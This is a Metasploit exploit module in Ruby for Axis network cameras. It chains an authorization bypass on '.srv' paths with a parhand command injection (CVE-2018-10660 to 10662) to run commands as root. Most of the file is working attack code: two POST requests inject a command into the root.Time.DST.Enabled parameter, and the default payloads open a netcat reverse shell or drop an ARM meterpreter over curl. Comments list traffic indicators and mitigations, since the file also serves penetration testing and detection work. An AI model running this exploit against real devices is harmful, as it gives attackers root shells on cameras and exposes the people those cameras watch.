Path: blob/master/modules/exploits/linux/http/axis_srv_parhand_rce.rb
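##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for Axis network cameras. Per its own description it
# combines an authorization bypass in the `.srv` request handling with a
# command injection in parhand, and the injected command runs as root
# ('Privileged' => true). The References list three CVEs and the vendor
# advisory (ACV-128401).
#
# Observable traffic, useful for detection rules and log review (all of it
# taken from the requests built in this file):
#   * every request path is /index.html/<8-42 random alphanumerics>.srv
#   * exploitation is two POSTs with action=dbus: the first `args` value calls
#     com.axis.PolicyKitParhand.SetParameter on root.Time.DST.Enabled with
#     shell metacharacters in the value, the second calls
#     com.axis.PolicyKitParhand.SynchParameters
#
# Mitigation is outside this file: firmware that addresses the referenced
# advisory, and a camera web interface that is not reachable from untrusted
# networks.
class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Registers the module metadata: references, the two targets (an in-memory
  # Unix command and an ARM little-endian dropper) and default options.
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Axis Network Camera .srv-to-parhand RCE',
        'Description' => %q{
          This module exploits an auth bypass in .srv functionality and a
          command injection in parhand to execute code as the root user.
        },
        'Author' => [
          'Or Peles', # Vulnerability discovery (VDOO)
          'wvu', # Metasploit module
          'sinn3r', # Metasploit module
          'Brent Cook', # Metasploit module
          'Jacob Robles', # Metasploit module
          'Matthew Kienow', # Metasploit module
          'Shelby Pace', # Metasploit module
          'Chris Lee', # Metasploit module
          'Cale Black' # Metasploit module
        ],
        'References' => [
          ['CVE', '2018-10660'],
          ['CVE', '2018-10661'],
          ['CVE', '2018-10662'],
          ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],
          ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']
        ],
        'DisclosureDate' => '2018-06-18',
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix In-Memory',
            'Platform' => 'unix',
            'Arch' => ARCH_CMD,
            'Type' => :unix_memory,
            'Payload' => {
              # A literal space is declared a bad character and the cmd/ifs
              # encoder is selected, so the command is sent without spaces.
              'BadChars' => ' ',
              'Encoder' => 'cmd/ifs',
              'Compat' => {
                'PayloadType' => 'cmd',
                'RequiredCmd' => 'netcat-e'
              }
            },
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
            }
          ],
          [
            'Linux Dropper',
            'Platform' => 'linux',
            'Arch' => ARCH_ARMLE,
            'Type' => :linux_dropper,
            'DefaultOptions' => {
              'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
            }
          ]
        ],
        'DefaultTarget' => 1,
        'DefaultOptions' => { 'WfsDelay' => 10 },
        # NOTE(review): reliability, stability and side effects are left
        # undeclared. As far as this file shows, execute_command overwrites
        # the device parameter root.Time.DST.Enabled and never restores it,
        # so a configuration change is at least one side effect to record
        # and to look for during incident review.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Probes the target with an unauthenticated GET for a random `.srv` path
  # under /index.html/ and classifies it by the HTTP status.
  #
  # A 204 is treated as the sign that the request was accepted; any other
  # status is reported as Safe. No response at all (timeout, refused
  # connection) is reported as Unknown rather than Safe, because an
  # unreachable device has not been shown to be patched and a "Safe" verdict
  # there would be a false negative in an assessment.
  #
  # @return [CheckCode] Appears, Safe or Unknown
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => "/index.html/#{rand_srv}"
    )

    return CheckCode::Unknown unless res
    return CheckCode::Appears if res.code == 204

    CheckCode::Safe
  end

  # Dispatches on the selected target type: the in-memory target sends the
  # encoded command payload directly, the dropper target goes through the
  # command stager (curl flavor, spaces not allowed).
  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(flavor: :curl, nospace: true)
    end
  end

  # Sends the two POST requests that carry one command to the device. Both
  # use action=dbus; the first sets root.Time.DST.Enabled to a value that
  # embeds `cmd`, the second asks parhand to synchronize its parameters.
  # Responses are not inspected, so the caller gets no success signal from
  # this method.
  #
  # @param cmd [String] command text placed inside the parameter value
  # @param opts [Hash] unused here; part of the CmdStager callback signature
  def execute_command(cmd, opts = {})
    send_request_cgi(
      'method' => 'POST',
      'uri' => "/index.html/#{rand_srv}",
      'vars_post' => {
        'action' => 'dbus',
        'args' => dbus_send(
          method: :set_param,
          param: "string:root.Time.DST.Enabled string:;(#{cmd})&"
        )
      }
    )

    send_request_cgi(
      'method' => 'POST',
      'uri' => "/index.html/#{rand_srv}",
      'vars_post' => {
        'action' => 'dbus',
        'args' => dbus_send(method: :synch_params)
      }
    )
  end

  # Builds the argument string sent in the `args` POST field: a system-bus
  # method call addressed to com.axis.PolicyKitParhand, followed by the
  # method name selected by `method`.
  #
  # @param method [Symbol] :set_param or :synch_params
  # @param param [String, nil] arguments appended after SetParameter
  # @return [String] the assembled argument string
  def dbus_send(method:, param: nil)
    args = '--system --dest=com.axis.PolicyKitParhand ' \
           '--type=method_call /com/axis/PolicyKitParhand '

    args <<
      case method
      when :set_param
        "com.axis.PolicyKitParhand.SetParameter #{param}"
      when :synch_params
        'com.axis.PolicyKitParhand.SynchParameters'
      end

    args
  end

  # Returns a fresh random file name of 8 to 42 alphanumeric characters with
  # a `.srv` extension; a new one is generated for every request.
  #
  # @return [String]
  def rand_srv
    "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
  end
end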